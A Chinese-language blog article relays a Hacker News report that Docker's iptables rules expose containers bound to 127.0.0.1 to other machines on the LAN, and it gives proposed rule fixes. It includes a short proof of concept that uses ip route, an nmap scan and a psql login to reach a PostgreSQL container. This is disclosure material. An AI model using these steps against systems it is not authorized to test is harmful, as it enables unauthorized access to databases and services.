Docker 暴重大安全漏洞:外部網絡可直接訪問映射到 127.0.0.1 的本地服務
近日 Hacker News 上面有一個貼子[1]火了,這是一封發給 Docker 安全團隊的郵件,主要講的是 Docker 有一個非常離譜的安全隱患。即使你通過像 ????-p 127.0.0.1:80:80???? 這樣的參數將端口暴露到回環地址,外部仍然可以訪問該服務,怎么回事呢?
原因其實很簡單,Docker 添加了這樣一條 Iptables 規則:
?? → iptables -nvL DOCKER
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80
只要外部攻擊者通過這臺主機將流量發送到 ??172.17.0.2:80??,就會匹配這條規則并成功訪問容器中的服務,127.0.0.1 并沒有什么卵用。
尷尬的是,選擇將端口映射到 127.0.0.1 的用戶基本上都是覺得這樣很安全,以至于他們不再想采取進一步的安全措施。現在問題來了,映射到 127.0.0.1 不能說是非常安全吧,只能說是與安全毫不相干。。。
概念驗證
下面通過一個例子來驗證。
① 在 A 機器上運行一個 PostgreSQL 容器,并將端口映射到 127.0.0.1。
# IP: 192.168.0.100
?? → docker run -e POSTGRES_PASSWORD=password -p 127.0.0.1:5432:5432 postgres
② 同一個局域網中的 B 機器添加路由表,將所有訪問 ??172.16.0.0/12?? 的流量指向 A 機器。
# IP: 192.168.0.200
?? → ip route add 172.16.0.0/12 via 192.168.0.100
③ 在 B 機器中掃描 A 機器的端口。
?? → nmap -p5432 -Pn --open 172.16.0.0/12
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-05 15:00 CDT
Nmap scan report for 172.17.0.2
Host is up (0.00047s latency).
PORT STATE SERVICE
5432/tcp open postgresql
④ 在 B 機器中直接連接 PostgreSQL。
?? → psql -h 172.17.0.2 -U postgres
Password for user postgres:
解決方案
事實上不僅僅是 127.0.0.1,你將容器端口映射到主機的任何一個地址,外部都可以訪問到,這就離了大譜了!
郵件作者給 Docker 團隊提出了一個解決方案,希望能優化 Docker 的 iptables 規則:
① 首先要嚴格限制允許訪問容器端口的源地址和網絡接口,例如 ??docker run -p 127.0.0.1:5432:5432?? 的原 iptables 規則如下:
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:5432
改進后的 iptables 規則如下:
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- lo docker0 127.0.0.1/8 172.17.0.2 tcp dpt:5432
同理,如果主機的地址為 ??192.168.0.100??,掩碼為 ??24??,那么 ??docker run -p 192.168.0.100:5432:5432?? 的 iptables 規則就應該是:
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- eth0 docker0 192.168.0.0/24 172.17.0.2 tcp dpt:5432
② 最后要修改默認行為,如果使用 ??-p?? 參數時沒有指定任何 IP 地址,就默認映射到 127.0.0.1。
雖然評論區也有很多人給出了添加 iptables 規則來進行限制的方案,但這是不現實的,目前全世界有成千上萬的用戶在使用 ??-p?? 參數將容器端口映射到 127.0.0.1,攻擊者估計早就發現了這個漏洞,我們不能期望用戶自己添加 iptables 規則來限制外部訪問,最靠譜的方式還是等 Docker 官方修復這個 bug 然后升級吧。
引用鏈接
[1]Hacker News 上面有一個貼子: https://news.ycombinator.com/item?id=31839936
